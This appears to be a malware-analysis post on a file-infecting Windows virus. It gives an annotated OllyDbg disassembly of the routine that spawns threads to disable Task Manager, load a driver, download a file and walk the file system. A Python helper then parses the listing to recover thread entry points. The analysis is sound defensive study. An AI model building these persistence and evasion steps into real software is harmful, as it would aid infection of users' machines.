This is a virus I found online.
It is a file-infecting virus; you can see that the idata and .src sections of the PE files it infects grow larger.
The virus feels like it is packed, but since I am studying its behaviour rather than unpacking it, I did not use the ESP rule (it can be unpacked that way). To analyse it you still have to trace it honestly: after stepping into the first call and going through all sorts of loops, the last retn lands in the decrypted code. You can see this code lives only in memory, and the function calls are very sneaky. Finally we get inside the real virus. It then creates a thread: first it creates a mutex, then creates a thread, after which control is handed back to the host. The newly created thread then gets to work and creates several more threads. These threads:
00A8EA33 55 push ebp
00A8EA34 8BEC mov ebp,esp
00A8EA36 B8 B0110100 mov eax,0x111B0
00A8EA3B E8 80480000 call 00A932C0
00A8EA40 57 push edi
00A8EA41 C785 54FEFFFF 0>mov dword ptr ss:[ebp-0x1AC],0x0
00A8EA4B 68 02800000 push 0x8002 ; SEM_NOGPFAULTERRORBOX|SEM_NOOPENFILEERRORBOX: suppress crash / file-error dialogs
00A8EA50 FF15 3401B000 call dword ptr ds:[0xB00134] ; kernel32.SetErrorMode
00A8EA56 8D85 70FEFFFF lea eax,dword ptr ss:[ebp-0x190]
00A8EA5C 50 push eax
00A8EA5D 6A 02 push 0x2 ; wVersionRequested = 2
00A8EA5F FF15 C401B000 call dword ptr ds:[0xB001C4] ; ws2_32.WSAStartup
00A8EA65 68 3040A900 push 0xA94030
00A8EA6A FF15 3001B000 call dword ptr ds:[0xB00130] ; kernel32.InitializeCriticalSection
00A8EA70 68 1840A900 push 0xA94018
00A8EA75 FF15 3001B000 call dword ptr ds:[0xB00130] ; kernel32.InitializeCriticalSection
00A8EA7B 68 5040A900 push 0xA94050
00A8EA80 FF15 3001B000 call dword ptr ds:[0xB00130] ; kernel32.InitializeCriticalSection
00A8EA86 E8 63F9FFFF call 00A8E3EE ; writes the registry to disable Task Manager, mutex
00A8EA8B 6A 00 push 0x0
00A8EA8D 6A 00 push 0x0
00A8EA8F 8D8D 54FEFFFF lea ecx,dword ptr ss:[ebp-0x1AC]
00A8EA95 51 push ecx
00A8EA96 6A 00 push 0x0
00A8EA98 6A 00 push 0x0
00A8EA9A 68 2AD2A800 push 0xA8D22A ; lpStartAddress (3rd push before the call): creates the mutex
00A8EA9F 6A 00 push 0x0
00A8EAA1 6A 00 push 0x0
00A8EAA3 FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
00A8EAA9 50 push eax
00A8EAAA E8 3626FFFF call 00A810E5
00A8EAAF 83C4 0C add esp,0xC
00A8EAB2 6A 00 push 0x0
00A8EAB4 6A 00 push 0x0
00A8EAB6 8D95 54FEFFFF lea edx,dword ptr ss:[ebp-0x1AC]
00A8EABC 52 push edx
00A8EABD 6A 00 push 0x0
00A8EABF 6A 00 push 0x0
00A8EAC1 68 7C54A800 push 0xA8547C ; lpStartAddress: loads the driver C:\WINDOWS\system32\drivers\qhklpk.sys
00A8EAC6 6A 00 push 0x0
00A8EAC8 6A 00 push 0x0
00A8EACA FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
00A8EAD0 50 push eax
00A8EAD1 E8 0F26FFFF call 00A810E5
00A8EAD6 83C4 0C add esp,0xC
00A8EAD9 6A 00 push 0x0
00A8EADB 6A 00 push 0x0
00A8EADD 8D85 54FEFFFF lea eax,dword ptr ss:[ebp-0x1AC]
00A8EAE3 50 push eax
00A8EAE4 6A 00 push 0x0
00A8EAE6 6A 00 push 0x0
00A8EAE8 68 BEE1A800 push 0xA8E1BE ; lpStartAddress: downloads a file from the Internet (InternetOpenUrl)
00A8EAED 6A 00 push 0x0
00A8EAEF 6A 00 push 0x0
00A8EAF1 FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
00A8EAF7 50 push eax
00A8EAF8 E8 E825FFFF call 00A810E5
00A8EAFD 83C4 0C add esp,0xC
00A8EB00 6A 00 push 0x0
00A8EB02 6A 00 push 0x0
00A8EB04 8D8D 54FEFFFF lea ecx,dword ptr ss:[ebp-0x1AC]
00A8EB0A 51 push ecx
00A8EB0B 6A 00 push 0x0
00A8EB0D 6A 00 push 0x0
00A8EB0F 68 6C3FA800 push 0xA83F6C ; lpStartAddress: walks the file system directories
00A8EB14 6A 00 push 0x0
00A8EB16 6A 00 push 0x0
00A8EB18 FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
00A8EB1E 50 push eax
00A8EB1F E8 C125FFFF call 00A810E5
00A8EB24 83C4 0C add esp,0xC
00A8EB27 6A 00 push 0x0
00A8EB29 6A 00 push 0x0
00A8EB2B 8D95 54FEFFFF lea edx,dword ptr ss:[ebp-0x1AC]
00A8EB31 52 push edx
00A8EB32 6A 00 push 0x0
00A8EB34 6A 00 push 0x0
00A8EB36 68 4958A800 push 0xA85849 ; lpStartAddress: creates a temporary file directory
00A8EB3B 6A 00 push 0x0
00A8EB3D 6A 00 push 0x0
00A8EB3F FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
00A8EB45 50 push eax
00A8EB46 E8 9A25FFFF call 00A810E5
00A8EB4B 83C4 0C add esp,0xC
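The listing above repeats the same stdcall pattern five times: six pushes, then `call kernel32.CreateThread`, with the thread's start routine always the third push before the call. The two extra `push 0x0` at the top of each block belong to the cdecl call made after CreateThread (hence `add esp,0xC`), so an argument walker must count exactly six pushes and not grab them. The following Python script is an added triage helper, not code from the post or from the virus; it parses a subset of the listing above (comments translated, embedded as the sample input), recovers each thread entry point from the push sequence, lists the imports called, and decodes the `SetErrorMode` argument. The column-matching regex is tailored to this OllyDbg layout and is an assumption for other listings.

```python
"""Triage helper: recover stdcall arguments from the push sequence before an
API call in an OllyDbg-style listing (address, opcode bytes, instruction ; comment)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Sample input: a subset of the listing in the post above, comments translated.
# The "push 0x0 / push 0x0" that belong to the cdecl call made *after* CreateThread
# are left in, so the walker must stop at exactly six pushes.
LISTING = r"""
00A8EA4B 68 02800000   push 0x8002
00A8EA50 FF15 3401B000 call dword ptr ds:[0xB00134] ; kernel32.SetErrorMode
00A8EA56 8D85 70FEFFFF lea eax,dword ptr ss:[ebp-0x190]
00A8EA5C 50            push eax
00A8EA5D 6A 02         push 0x2
00A8EA5F FF15 C401B000 call dword ptr ds:[0xB001C4] ; ws2_32.WSAStartup
00A8EA86 E8 63F9FFFF   call 00A8E3EE ; writes the registry to disable Task Manager
00A8EA8B 6A 00         push 0x0
00A8EA8D 6A 00         push 0x0
00A8EA8F 8D8D 54FEFFFF lea ecx,dword ptr ss:[ebp-0x1AC]
00A8EA95 51            push ecx
00A8EA96 6A 00         push 0x0
00A8EA98 6A 00         push 0x0
00A8EA9A 68 2AD2A800   push 0xA8D22A ; creates the mutex
00A8EA9F 6A 00         push 0x0
00A8EAA1 6A 00         push 0x0
00A8EAA3 FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
00A8EAA9 50            push eax
00A8EAAA E8 3626FFFF   call 00A810E5
00A8EAAF 83C4 0C       add esp,0xC
00A8EAB2 6A 00         push 0x0
00A8EAB4 6A 00         push 0x0
00A8EAB6 8D95 54FEFFFF lea edx,dword ptr ss:[ebp-0x1AC]
00A8EABC 52            push edx
00A8EABD 6A 00         push 0x0
00A8EABF 6A 00         push 0x0
00A8EAC1 68 7C54A800   push 0xA8547C ; loads the driver C:\WINDOWS\system32\drivers\qhklpk.sys
00A8EAC6 6A 00         push 0x0
00A8EAC8 6A 00         push 0x0
00A8EACA FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
"""

# Assumption: only the mnemonics present in this excerpt need recognising.
INSN_RE = re.compile(
    r'^(?P<addr>[0-9A-F]{8})\s.*?\b(?P<mnem>push|call|mov|lea|add)\b\s*'
    r'(?P<ops>.*?)\s*(?:;\s*(?P<comment>.*))?$')

# SetErrorMode flag bits (winbase.h values).
SEM_FLAGS = {0x0001: 'SEM_FAILCRITICALERRORS', 0x0002: 'SEM_NOGPFAULTERRORBOX',
             0x0004: 'SEM_NOALIGNMENTFAULTEXCEPT', 0x8000: 'SEM_NOOPENFILEERRORBOX'}


@dataclass
class Insn:
    addr: int
    mnem: str
    ops: str
    comment: str


def parse_listing(text: str) -> List[Insn]:
    insns = []
    for line in text.strip().splitlines():
        m = INSN_RE.match(line.strip())
        if m:
            insns.append(Insn(int(m['addr'], 16), m['mnem'], m['ops'].strip(),
                              (m['comment'] or '').strip()))
    return insns


def immediate(insn: Insn) -> Optional[int]:
    """Value of a 'push 0x...' operand, or None for register operands."""
    m = re.fullmatch(r'0x([0-9A-Fa-f]+)', insn.ops)
    return int(m.group(1), 16) if m else None


def stdcall_args(insns: List[Insn], call_idx: int, nargs: int) -> List[Insn]:
    """The nargs pushes feeding the call at call_idx, in argument order (arg 0 first).
    stdcall pushes right-to-left, so the push nearest the call is the first argument.
    An earlier call ends the walk: pushes before it were consumed by that call."""
    args, j = [], call_idx - 1
    while j >= 0 and len(args) < nargs:
        if insns[j].mnem == 'push':
            args.append(insns[j])
        elif insns[j].mnem == 'call':
            break
        j -= 1
    if len(args) != nargs:
        raise ValueError(f'only {len(args)} of {nargs} pushes before {insns[call_idx].addr:08X}')
    return args


def winapi_calls(insns: List[Insn]) -> List[str]:
    """Imports called through the IAT, taken from OllyDbg's 'module.Func' annotation."""
    return [i.comment for i in insns if i.mnem == 'call' and re.fullmatch(r'\w+\.\w+', i.comment)]


def thread_entry_points(insns: List[Insn]) -> List[Tuple[int, Optional[int], str]]:
    """(call address, lpStartAddress, analyst note) for every CreateThread call."""
    out = []
    for idx, insn in enumerate(insns):
        if insn.mnem == 'call' and insn.comment == 'kernel32.CreateThread':
            start = stdcall_args(insns, idx, 6)[2]   # arg 2 = lpStartAddress
            out.append((insn.addr, immediate(start), start.comment))
    return out


def error_mode_flags(insns: List[Insn]) -> List[str]:
    """Decode the uMode argument of the first SetErrorMode call."""
    for idx, insn in enumerate(insns):
        if insn.mnem == 'call' and insn.comment == 'kernel32.SetErrorMode':
            value = immediate(stdcall_args(insns, idx, 1)[0]) or 0
            return [name for bit, name in sorted(SEM_FLAGS.items()) if value & bit]
    return []


if __name__ == '__main__':
    insns = parse_listing(LISTING)
    print('imports called:', winapi_calls(insns))
    print('SetErrorMode:', error_mode_flags(insns))
    for call_addr, start, note in thread_entry_points(insns):
        print(f'{call_addr:08X} CreateThread -> {start:08X}  {note}')
```

Running it yields the two thread routines 0xA8D22A and 0xA8547C with their notes, and shows that 0x8002 is SEM_NOGPFAULTERRORBOX|SEM_NOOPENFILEERRORBOX, i.e. the sample silences crash and missing-file dialogs before spawning its worker threads. Feed it the full listing and you get all five entry points as breakpoint targets for the next tracing session.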